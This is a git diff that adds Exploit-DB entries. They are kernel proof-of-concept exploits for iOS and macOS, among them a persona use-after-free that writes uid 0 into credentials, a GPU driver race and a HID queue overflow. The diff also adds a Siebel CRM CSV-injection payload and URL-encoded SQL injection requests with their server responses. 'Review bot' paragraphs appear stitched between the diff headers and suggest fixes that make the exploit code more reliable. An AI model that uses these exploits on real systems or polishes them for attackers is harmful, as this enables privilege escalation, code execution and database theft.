diff --git a/exploits/ios/dos/45649.txt b/exploits/ios/dos/45649.txt
new file mode 100644
index 000000000..1124c43c3
--- /dev/null
+++ b/exploits/ios/dos/45649.txt
@@ -0,0 +1,58 @@ +Here's a code snippet from sleh.c with the second level exception handler for undefined instruction exceptions: + + static void + handle_uncategorized(arm_saved_state_t *state, boolean_t instrLen2) + { + exception_type_t exception = EXC_BAD_INSTRUCTION; + mach_exception_data_type_t codes[2] = {EXC_ARM_UNDEFINED}; + mach_msg_type_number_t numcodes = 2; + uint32_t instr; <------ (a) + + if (instrLen2) { + uint16_t instr16; + COPYIN(get_saved_state_pc(state), (char *)&instr16, sizeof(instr16)); + + instr = instr16; + } else { + COPYIN(get_saved_state_pc(state), (char *)&instr, sizeof(instr)); <------- (b) + } + + .... + + else { + codes[1] = instr; <------ (c) + } + } + + exception_triage(exception, codes, numcodes); <-------- (d) + + + At (a) the uint32_t instr is declared uninitialized on the stack. + At (b) the code tries to copyin the bytes of the exception-causing instruction from userspace + note that the COPYIN macro doesn't itself check the return value of copyin, it just calls it. + At (c) instr is assigned to codes[1], which at (d) is passed to exception_triage. + + that codes array will eventually end up being sent in an exception mach message. + + The bug is that we can force copyin to fail by unmapping the page containing the undefined instruction + while it's being handled. (I tried to do this with XO memory but the kernel seems to be able to copyin that just fine.) + + This PoC has an undefined instruction (0xdeadbeef) on its own page and spins up a thread to keep + switching the protection of that page between VM_PROT_NONE and VM_PROT_READ|VM_PROT_EXECUTE. + + We then keep spinning up threads which try to execute that undefined instruction. + + If the race windows align the thread executes the undefined instruction but when the sleh code tries to copyin + the page is unmapped, the copying fails and the exception message we get has stale stack memory. 
+ + This PoC just demonstrates that you do get values which aren't 0xdeadbeef in there for the EXC_ARM_UNDEFINED type. + You'd have to do a bit more fiddling to work out how to get something specific there. + + Note that there are lots of other unchecked COPYIN's in sleh.c (eg when userspace tries to access a system register not allowed + for EL0) and these seem to have the same issue. + + tested on iPod Touch 6g running 11.3.1, but looking at the kernelcache it seems to still be there in iOS 12. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45649.zip \ No newline at end of file diff --git a/exploits/ios/dos/45652.c b/exploits/ios/dos/45652.c new file mode 100644 index 000000000..8ea6c3e91 --- /dev/null +++ b/exploits/ios/dos/45652.c 
@@ -0,0 +1,171 @@ +/* +There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient: + + In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail: + + error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id)); + if (error) + goto out_error; + +This jumps here: + if (persona) + persona_put(persona); + +At this point the persona is actually in the global list and the reference has been transfered there; this code +is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id. + +The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another), +causing an extra call to persona_put. + +It's probably possible to make the failing copyout take a long time, +allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type. + +This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln +is still there, but I cannot test it. + +It should be easy to fix up this PoC to run as root in your testing environment. 
+*/ + +// @i41nbeer + +#include "test_next_exploit.h" +#include +#include +#include + +#include "kmem.h" + + +/* +iOS kernel UaF due to bad error handling in personas + +There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient: + + In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail: + + error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id)); + if (error) + goto out_error; + +This jumps here: + if (persona) + persona_put(persona); + +At this point the persona is actually in the global list and the reference has been transfered there; this code +is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id. + +The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another), +causing an extra call to persona_put. + +It's probably possible to make the failing copyout take a long time, +allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type. + +This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln +is still there, but I cannot test it. + +It should be easy to fix up this PoC to run as root in your testing environment. +*/ + + + +#define NGROUPS 16 +#define MAXLOGNAME 255 + +struct kpersona_info { + uint32_t persona_info_version; + + uid_t persona_id; /* overlaps with UID */ + int persona_type; + gid_t persona_gid; + uint32_t persona_ngroups; + gid_t persona_groups[NGROUPS]; + uid_t persona_gmuid; + char persona_name[MAXLOGNAME+1]; + + /* TODO: MAC policies?! 
*/ +}; + +enum { + PERSONA_INVALID = 0, + PERSONA_GUEST = 1, + PERSONA_MANAGED = 2, + PERSONA_PRIV = 3, + PERSONA_SYSTEM = 4, + + PERSONA_TYPE_MAX = PERSONA_SYSTEM, +}; + +#define PERSONA_OP_ALLOC 1 +#define PERSONA_OP_DEALLOC 2 +#define PERSONA_OP_GET 3 +#define PERSONA_OP_INFO 4 +#define PERSONA_OP_PIDINFO 5 +#define PERSONA_OP_FIND 6 + +#define PERSONA_INFO_V1 1 + +#define PERSONA_SYSCALL_NUMBER 494 +int sys_persona(uint32_t operation, uint32_t flags, struct kpersona_info *info, uid_t *id, size_t *idlen) { + return syscall(PERSONA_SYSCALL_NUMBER, operation, flags, info, id, idlen); +} + +void persona_dealloc() { + uid_t uid = 235; + size_t uid_size = sizeof(uid); + int perr = sys_persona(PERSONA_OP_DEALLOC, 0, NULL, &uid, &uid_size); + printf("dealloc perr: 0x%x\n", perr); +} + +void* persona_bad_alloc() { + // let's try to alloc a persona: + struct kpersona_info info = {0}; + uid_t kpersona_uid = -123; + size_t kpersona_uid_size = sizeof(kpersona_uid); + + info.persona_info_version = PERSONA_INFO_V1; + strcpy(info.persona_name, "a_name2"); + + info.persona_id = 235; + info.persona_type = PERSONA_GUEST; + + int perr = sys_persona(PERSONA_OP_ALLOC, 0, &info, NULL/*&kpersona_uid*/, &kpersona_uid_size); + printf("err: %x\n", perr); + printf("kpersona_uid: %d\n", kpersona_uid); + + return NULL; +} + +void* dealloc_thread_func(void* arg) { + int uid = getuid(); + printf("dealloc thread uid: %d\n", uid); + // got r00t? + while(1) { + persona_dealloc(); + } +} + +void* alloc_thread_func(void* arg) { + int uid = getuid(); + printf("alloc_thread uid: %d\n", uid); + // got r00t? 
+ while(1) { + persona_bad_alloc(); + } +} + +void go(uint64_t thread_t) { + uint64_t bsd_thread_info = rk64(thread_t + 0x388); + uint64_t cred_t = rk64(bsd_thread_info + 0x160); + + // uid:=0 + wk32(cred_t+0x18, 0); + wk32(cred_t+0x1c, 0); + + pthread_t dealloc_thread; + pthread_create(&dealloc_thread, NULL, dealloc_thread_func, NULL); + + pthread_t alloc_thread; + pthread_create(&alloc_thread, NULL, alloc_thread_func, NULL); + + pthread_join(dealloc_thread, NULL); +} \ No newline at end of file diff --git a/exploits/java/webapps/45643.txt b/exploits/java/webapps/45643.txt new file mode 100644 index 000000000..093821775 --- /dev/null +++ b/exploits/java/webapps/45643.txt 
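Review bot: In go(), both pthread_create() results are ignored, so if the dealloc thread fails to start the following pthread_join(dealloc_thread, ...) joins an indeterminate `pthread_t`; check the return and bail, e.g. `if (pthread_create(&dealloc_thread, NULL, dealloc_thread_func, NULL) != 0) { perror("pthread_create"); return; }`. The kernel offsets `0x388`, `0x160`, `0x18` and `0x1c` used with rk64()/wk32() in go() are build-specific and should be named constants with the build they were taken from (the comment says iOS 11.3.1) recorded beside them, otherwise a reader cannot tell what struct fields they are meant to address. persona_bad_alloc() is declared `void*` but every call site drops its result and it only ever returns NULL; a plain `void` function would be clearer. The `#include` directives in this hunk carry no header names, which looks like a rendering artifact rather than the file's real content — worth confirming against the original. The description block is also present twice (as the leading comment and again after the includes); keeping a single copy avoids the two drifting apart.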
@@ -0,0 +1,42 @@ +# Exploit Title: Oracle Siebel CRM 8.1.1 - CSV Injection +# Date: 2018-10-21 +# Exploit Author: Sarath Nair aka AceNeon13 +# Contact: @AceNeon13 +# Vendor Homepage: www.oracle.com +# Software Link: http://www.oracle.com/us/products/applications/siebel/siebel-crm-8-1-1-066196.html +# Version: Oracle Siebel CRM Version 8.1.1 and below + +# PoC Exploit: CSV Injection +# Vulnerable URL: All CSV Export functionalities within the CRM application +# Description: Siebel CRM application was found to be vulnerable to Excel Macro injection vulnerability, +# in places where user input is allowed (in text form) and the input can then be exported in CSV +# form. An attacker can change user information to include in his input a malicious excel function. + +=-2+3+cmd|' /C calc'!D + +# The function will then be executed on the victim’s machine, +# once the victim exports the details in CSV format and opens the exported file in Microsoft Excel. + +# Impact: The vulnerability doesn’t target the web application but rather its users. +# A hypothetical attacker could use it, in order to trick other application users into unwillingly +# executing arbitrary malicious code, potentially leading to full a compromise of their workstation. +# Although excel has implemented certain features to protect its users +# (the user is asked whether he wants to execute a potentially harmful external script), +# the user could easily assume that the content can be trusted since the file is +# extracted from a trusted source. + +# Solution: Disable CSV export in all list applets and where CSV export is available. 
+# https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html#c_Patch_Management_ai1029938a + +######################################## +# Vulnerability Disclosure Timeline: + +2017-November-20: Discovered vulnerability +2017-November-23: Vendor Notification +2017-November-29: Vendor Response/Feedback +2018-October-04: Vendor Fix/Patch/Workaround +2018-October-21: Public Disclosure +######################################## + +Warm regards, +Sarath Nair \ No newline at end of file diff --git a/exploits/macos/dos/45647.c b/exploits/macos/dos/45647.c new file mode 100644 index 000000000..ce1abae01 --- /dev/null +++ b/exploits/macos/dos/45647.c 
@@ -0,0 +1,245 @@ +/* +This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.) + +That report showed the bug in the unmap_user_memory external methods; a variant also exists +in the map_user_memory external methods. + +The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe. + +map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees) + +tested on MacOS 10.13.5 (17F77) on MacBookPro10,1 +*/ + +//ianbeer + +// build: clang -o ig_gl_unmap_racer ig_gl_unmap_racer.c -framework IOKit + +#if 0 +UaF/Double-delete due to bad locking in Apple Intel GPU driver + +This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.) + +That report showed the bug in the unmap_user_memory external methods; a variant also exists +in the map_user_memory external methods. + +The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe. 
+ +map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees) + +tested on MacOS 10.13.5 (17F77) on MacBookPro10,1 + +#endif + +#include +#include +#include +#include +#include + +#include +#include + +#include + +#include + +#include + +#include + + +struct mem_desc { + uint64_t ptr; + uint64_t size; +}; + +uint64_t map_user_memory(mach_port_t conn) { + kern_return_t err; + void* mem = malloc(0x20000); + // make sure that the address we pass is page-aligned: + mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff); + printf("trying to map user pointer: %p\n", mem); + + uint64_t inputScalar[16] = {0}; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096] = {0}; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16] = {0}; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096] = {0}; + size_t outputStructCnt = 0; + + inputScalarCnt = 0; + inputStructCnt = 0x10; + + outputScalarCnt = 4096; + outputStructCnt = 16; + + struct mem_desc* md = (struct mem_desc*)inputStruct; + md->ptr = (uint64_t)mem; + md->size = 0x1000; + + err = IOConnectCallMethod( + conn, + 0x200, // IGAccelGLContext::map_user_memory + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + //return 0; + } else{ + printf("worked? 
outputScalarCnt = %d\n", outputScalarCnt); + } + + printf("outputScalarCnt = %d\n", outputScalarCnt); + + md = (struct mem_desc*)outputStruct; + printf("0x%llx :: 0x%llx\n", md->ptr, md->size); + + return (uint64_t)mem; +} + +uint64_t unmap_user_memory(mach_port_t conn, uint64_t handle) { + kern_return_t err; + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + inputScalarCnt = 0; + inputStructCnt = 0x8; + + outputScalarCnt = 4096; + outputStructCnt = 16; + + *((uint64_t*)inputStruct) = handle; + + err = IOConnectCallMethod( + conn, + 0x201, // IGAccelGLContext::unmap_user_memory + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + } else{ + printf("worked?\n"); + } + + return 0; +} + +mach_port_t get_user_client(char* name, int type) { + kern_return_t err; + + CFMutableDictionaryRef matching = IOServiceMatching(name); + if(!matching){ + printf("unable to create service matching dictionary\n"); + return 0; + } + + io_iterator_t iterator; + err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); + if (err != KERN_SUCCESS){ + printf("no matches\n"); + return 0; + } + + io_service_t service = IOIteratorNext(iterator); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + printf("got service: %x\n", service); + + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), type, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + printf("got userclient connection: %x\n", conn); + + return conn; +} + +volatile mach_port_t gl_context = MACH_PORT_NULL; + +#define N_HANDLES 40 +void 
go(void* arg){ + while (1) { + uint64_t handles[N_HANDLES] = {0}; + for (int i = 0; i < N_HANDLES; i++) { + handles[i] = map_user_memory(gl_context); + } + + for (int i = 0; i < N_HANDLES; i++) { + unmap_user_memory(gl_context, handles[i]); + } + } +} + + + + + +int main(int argc, char** argv){ + // get an IGAccelGLContext + gl_context = get_user_client("IntelAccelerator", 1); + printf("gl_context: %x\n", gl_context); + + // get a IGAccelSharedUserClient + mach_port_t shared = get_user_client("IntelAccelerator", 6); + printf("shared: %x\n", shared); + + // connect the gl_context to the shared UC so we can actually use it: + kern_return_t err = IOConnectAddClient(gl_context, shared); + if (err != KERN_SUCCESS){ + printf("IOConnectAddClient error: %x\n", err); + return 0; + } + + printf("added client to the shared UC\n"); + +#define N_THREADS 2 + pthread_t threads[N_THREADS]; + + for (int i = 0; i < N_THREADS; i++) { + pthread_create(&threads[i], NULL, go, NULL); + } + + pthread_join(threads[0], NULL); + + + return 0; + + +} \ No newline at end of file diff --git a/exploits/multiple/dos/45648.txt b/exploits/multiple/dos/45648.txt new file mode 100644 index 000000000..24e970324 --- /dev/null +++ b/exploits/multiple/dos/45648.txt 
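Review bot: map_user_memory() sets `outputScalarCnt = 4096` for an `outputScalar` array of only 16 elements, so IOConnectCallMethod() is told the caller has room for 4096 scalars and a method that does return scalars would overrun the stack buffer; the in/out count must describe the real capacity, `outputScalarCnt = 16;` (the same line appears in unmap_user_memory()). The same function leaks every `malloc(0x20000)` because the pointer is overwritten by the rounded-up address and never freed, and since go() calls it forty times per iteration of an infinite loop the process grows without bound; `posix_memalign()` (or keeping the original pointer and freeing it after the call) fixes the leak, and the round-trip through `uint64_t` should use `uintptr_t`. `go()` is declared `void go(void*)` but is passed to pthread_create(), which expects `void *(*)(void *)`; the signature should be `void *go(void *arg)`. get_user_client() never releases `iterator` or `service` with IOObjectRelease(), and the IOServiceOpen() failure path returns 0 without a cleanup either.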
@@ -0,0 +1,36 @@ +io_hideventsystem is a MIG service which provides proxy access to various HID devices for untrusted +clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is +in IOKit.framework. + +I, and also pangu jailbreak team, had previously found a few bugs in the kernel IODataQueue code. +It seems that io_hideventsystem also uses IODataQueues purely in userspace. That is, via shared +memory between two userspace processes rather than between a userspace process and the kernel. + +It turns out that the userspace code for enqueuing and dequeuing from an IODataQueue has none +of the hardening that the kernel code now has, so it's trivial to just replace the length, head +and tail fields (which are in a header at the start of the shared memory buffer) such that +the remote process tries to enqueue outside of the bounds of the IODataQueue's actual backing +buffer. + +This is a very basic PoC thrown together to minimally repro the issue. + +Run build.sh and run.sh, use the mouse a bit and notice the hidd crash log. Don't try to attach lldb to hidd, you will +struggle to interact with it! + +Specifically the server will allocate a buffer wrapped by a mach port (via mach_make_memory_entry_64) +then in the client you can see inside IOHIDEventQueueCreateWithVM the port's memory being mapped. + +The attached dylib just interposes mach_vm_map to replace the size and tail fields once the shared +memory is mapped in the client. + +I've also tested this on iOS just manually manipulating the shared memory after it's mapped. + +Depending on how clients use io_hideventsystem it might be possible to hop first in to backboardd +then in to another client (if that client is also enqueuing events into a queue) but that will +take some more research. + +Tested on MacOS 10.13.6 and iOS 11.3.1 (that's the highest version I have on a device with me right now.) 
+ + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45648.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45650.txt b/exploits/multiple/dos/45650.txt new file mode 100644 index 000000000..af3c484dc --- /dev/null +++ b/exploits/multiple/dos/45650.txt @@ -0,0 +1,16 @@ +io_hideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts +a mach message which it sends whenever it wants to notify a client that there's data available +in the queue. + +As a client we can modify this mach message such that the server (hidd on MacOS, backboardd on iOS) +will send us an arbitrary mach port from its namespace with an arbitrary disposition. + +This is a minimal PoC to demonstrate the issue. Interpose it in to the PoC for P0 1623, Apple issue 695930632 + +Attaching two PoCS: +deja-xnu: exploit for this issue on iOS 11.4.1 to get code execution as backboardd, and then trigger p0 issue 1658 +dq8: exploit for this issue, and a new exploit for the original pangu variant of this issue to get a real tfp0 on iOS 7.1.2 + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45650.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45651.c b/exploits/multiple/dos/45651.c new file mode 100644 index 000000000..fcca6b911 --- /dev/null +++ b/exploits/multiple/dos/45651.c 
@@ -0,0 +1,230 @@ +/* +IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, +which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. + +I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) + +IOHIDResourceQueue::enqueueReport has basically the same bug: + +Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) +{ + UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); + UInt32 reportSize = report ? (UInt32)report->getLength() : 0; + UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) + UInt32 head; + UInt32 tail; + UInt32 newTail; + const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; + IODataQueueEntry * entry; + + // Force a single read of head and tail + head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); + tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); + + if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) + { + return false; + } + + if ( tail >= head ) + { + // Is there enough room at the end for the entry? + if ((getQueueSize() - tail) >= entrySize ) + { + entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); + + entry->size = dataSize; + + bcopy(header, &entry->data, headerSize); + + if ( report ) + report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) + + + + +Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion +of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) +giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) +for the actually memory write operation. 
+ +The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one +of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. + +A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, +so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) + +You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example +from the IOHIDFamily code, giving it the correct entitlement and running it. +*/ + +// @i41nbeer + +/* +iOS/MacOS kernel memory corruption due to integer overflow in IOHIDResourceQueue::enqueueReport + +IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, +which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. + +I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) + +IOHIDResourceQueue::enqueueReport has basically the same bug: + +Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) +{ + UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); + UInt32 reportSize = report ? 
(UInt32)report->getLength() : 0; + UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) + UInt32 head; + UInt32 tail; + UInt32 newTail; + const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; + IODataQueueEntry * entry; + + // Force a single read of head and tail + head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); + tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); + + if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) + { + return false; + } + + if ( tail >= head ) + { + // Is there enough room at the end for the entry? + if ((getQueueSize() - tail) >= entrySize ) + { + entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); + + entry->size = dataSize; + + bcopy(header, &entry->data, headerSize); + + if ( report ) + report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) + + + + +Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion +of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) +giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) +for the actually memory write operation. + +The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one +of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. + +A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, +so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) 
+ +You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example +from the IOHIDFamily code, giving it the correct entitlement and running it. + +Tested on MacOS 10.13.6 (17G65) +*/ + +#include +#include +#include +#include + +#include + +#include +#include + +int main(int argc, char** argv){ + printf("pid: %d\n", getpid()); + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + printf("got client\n"); + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + // open + + inputScalar[0] = 0; + inputScalarCnt = 1; + + err = IOConnectCallMethod( + conn, + 1, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + return 0; + } + + printf("called external method open\n"); + + mach_vm_address_t addr = 0x4100000000; + mach_vm_size_t size = 0x1000; + + err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0); + if (err != KERN_SUCCESS){ + printf("IOConnectMapMemory failed:0x%x\n", err); + return 0; + } + + printf("mapped queue memory here: %016llx\n", addr); + + char* buf = malloc(0x100000000); + memset(buf, 'A', 0x100000000); + + inputScalar[0] = 0x0; + inputScalar[1] = 0x0; + inputScalarCnt = 3; + outputScalarCnt = 0; + + err = IOConnectCallMethod( + conn, + 13, // setreport + inputScalar, + 
inputScalarCnt, + buf, + 0xffffffff, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + return 0; + } + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/45639.txt b/exploits/php/webapps/45639.txt new file mode 100644 index 000000000..2568da68c --- /dev/null +++ b/exploits/php/webapps/45639.txt 
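Review bot: The setreport call passes `inputScalarCnt = 3` but only `inputScalar[0]` and `inputScalar[1]` are assigned and the array has no initializer, so the third scalar handed to the kernel is an indeterminate stack value; either declare `uint64_t inputScalar[16] = {0};` or set `inputScalar[2]` explicitly. The `malloc(0x100000000)` result goes straight into memset() with no NULL check, which is a plain crash when a 4 GiB allocation fails; add `if (!buf) { perror("malloc"); return 1; }` before the memset. `service` and `conn` are not released with IOObjectRelease()/IOServiceClose() on any of the early-return paths. On the kernel side, the excerpt in the header comment shows the missing check itself: the sum `headerSize + reportSize` at (a) has to be tested for wrap-around (or reportSize bounded against the queue size) before dataSize is derived from it, because the comparison at (b) only ever sees the already-truncated value. The description block is also duplicated verbatim between the two leading comments.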
@@ -0,0 +1,78 @@ +# Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.bookman.nl +# Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] +# function edit_rec() { +# if (isset ($_GET['id'])) $in_id = $_GET['id']; +# if ($_GET['mte_a'] == 'edit') $edit=1; +# else $edit = 0; +# $count_required = 0; +# $rows = ''; +# $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); + +GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 14:34:58 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Mon, 26 Jul 1997 05:00:00 GMT +Cache-Control: private +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT +Content-Length: 3642 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] +# +# function del_rec() { +# $in_id = $_GET['id']; +# if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { +# $this->content_deleted = " + +GET 
/[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 14:38:18 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Mon, 26 Jul 1997 05:00:00 GMT +Cache-Control: private +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT +Content-Length: 1046 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45642.txt b/exploits/php/webapps/45642.txt new file mode 100644 index 000000000..66de62a75 --- /dev/null +++ b/exploits/php/webapps/45642.txt 
